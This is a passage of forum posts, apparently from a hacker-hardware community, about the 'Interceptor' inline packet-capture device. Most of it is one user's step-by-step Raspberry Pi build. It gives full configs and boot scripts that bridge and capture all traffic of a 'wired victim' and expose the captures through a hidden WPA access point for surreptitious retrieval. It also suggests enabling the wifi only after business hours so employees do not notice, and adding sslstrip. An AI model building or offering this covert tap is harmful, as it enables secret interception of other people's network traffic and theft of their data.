Search the Community

From what I've gathered reading through this forum for the past 20 minutes, the interceptor is the community project that birthed the Packet Squirrel. What I want to know is, why even bother with the Pi/Packet squirrel? In Irongeek's implementation, he used a pi zero with an ethernet-usb adapter. Now, in 2018, we could use a pi zero and an usb/ethernet hub along with another ethernet adapter to achieve the same functionality. But, what was stopping them from using an arduino pro mirco/nano with 2 ethernet adapters and just logging everything to an SD Card? I may just be pandering, but I don't really have the money for a $50 mitm packet capturing device, so I was just wondering why it didn't work out when implemented using just an arduino, 2 ethernet adapters, and a micro sd adapter. I think that'd be a lot cheaper than a packet squirrel. Correct me if I'm wrong, but isn't the interceptor just collecting packets, or is it forwarding them across the net?

I need help, i received an assignment to complete security testing on "Windows Desktop application" I verified the file level of security and binary code review but i want to do interception of request and response but am literally struck, in google found some tools like Echo-mirage and Wireshark - While attaching echo-mirage tool to my desktop application it showing message like "A Problem caused the program to stop working correctly windows will close the program and notify you if a solution is available." - Whireshark : am not getting proper idea on Thanks in advance, your response is highly appreciated.

So have Darren and Seb made a Pineapple with Karma for cell phone interceptions? http://venturebeat.com/2014/09/02/who-is-putting-up-interceptor-cell-towers-the-mystery-deepens/

The Interceptor has long been kind of a dead project. It makes sense too. The fon+, the hardware Robin Wood originally wrote his interceptor code for is way past EOL, hard to find, and under-featured given the current landscape of embedded/SOC offerings. By borrowing some of irongeek's raspberry pi recipes, and adding in some pi-point, I was able to get very similar functionality out of my raspberry pi. Heres how. Hardware: Raspberry Pi Model B 32GB SD Card Belkin 4 port powered USB hub Alfa wifi card (NHA, from the hakshop) USB Ethernet adapter (also from the hakshop) OS: Latest image of rasbian Software: All can be apt-get installed bridge-utils tcpdump hostapd fkill hostapd zd1211-firmware hostap-utils iw dnsmasq Edit /etc/network/interfaces to look like this: auto lo iface lo inet loopback iface eth0 inet dhcp iface wlan0 inet static address 192.168.0.1 netmask 255.255.255.0 Edit /etc/dnsmasq.conf # Never forward plain names (without a dot or domain part) domain-needed # Only listen for DHCP on wlan0 interface=wlan0 # Create a dhcp range on your /24 wlan0 network with 12 hour lease time dhcp-range=192.168.0.5,192.168.0.254,255.255.255.0,12h Edit /etc/hostapd/hostapd.conf (notice it is wpa with the preshared key at /etc/hostapd-psk - the ssid is also hidden) interface=wlan0 driver=nl80211 ssid=monkey channel=1 auth_algs=1 wpa=1 wpa_psk_file=/etc/hostapd-psk wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP TKIP rsn_pairwise=CCMP ignore_broadcast_ssid=1 Next Create/edit /etc/hostapd-psk 00:00:00:00:00:00 YourSuperLongAndSecurePasswd We're all set! Below you'll see my script for the intercepting portion of the monkey. Feel free to put it in /etc/rc.local to make it run on boot up. #!/bin/bash #Change settings below to match network eth_ip="192.168.1.199" eth_netmask="255.255.255.0" eth_broadcast="192.168.1.255" brctl addbr mybridge brctl addif mybridge eth0 brctl addif mybridge eth1 ifconfig eth0 0.0.0.0 promisc up ifconfig eth1 0.0.0.0 promisc up ifconfig mybridge promisc up ifconfig mybridge $eth_ip netmask $eth_netmask broadcast $eth_broadcast tcpdump -i eth1 -w /root/cap.pcap & And here is my script for the wifi access point portion of the monkey, again you can put it in rc.local # turn on forwarding echo 1 > /proc/sys/net/ipv4/ip_forward # enable NAT iptables -t nat -A POSTROUTING -j MASQUERADE # start the access point hostapd -B /etc/hostapd/hostapd.conf Now you're passing along all wired traffic to and from your wired victim, all whilst capturing every packet that goes by. You can then surreptitiously nab the pcap via the hidden wifi AP. What it doesn't do: Unlike the interceptor, it doesn't clone the traffic and pipe it over wifi and/or vpn. It merely captures the traffic and stores it for later retrieval. This was necessary with the original fon+, because there was no usb port, and only a dozen or so MB of storage. Now with USB and storage cheaper than ever, you can store days/weeks/months of captures if you want. Things to add: -Cronjob that will only turn on the wifi at certain times such as after business hours. That way no employee who happens to be chilling with airodump-ng running notices anything odd. -Cronjob that changes the wifi card from master mode to managed and connects to a wifi access point as a client to securely send the cap files. In doing so you could also send an email/upload a status file. -Add Jasegar functionality to the wifi AP (this ones the biggy) -Add the all important sslstrip functionality (something I've tried but can't get to work - if theres interest, I'll happily share my findings) -Add in Moriarty's awesome new UWUI So thats it! I've been testing this for the last several hours and it works great. Hope you guys find this interesting enough to give it a try yourself and post your experience here. Long live the interceptor monkey! telot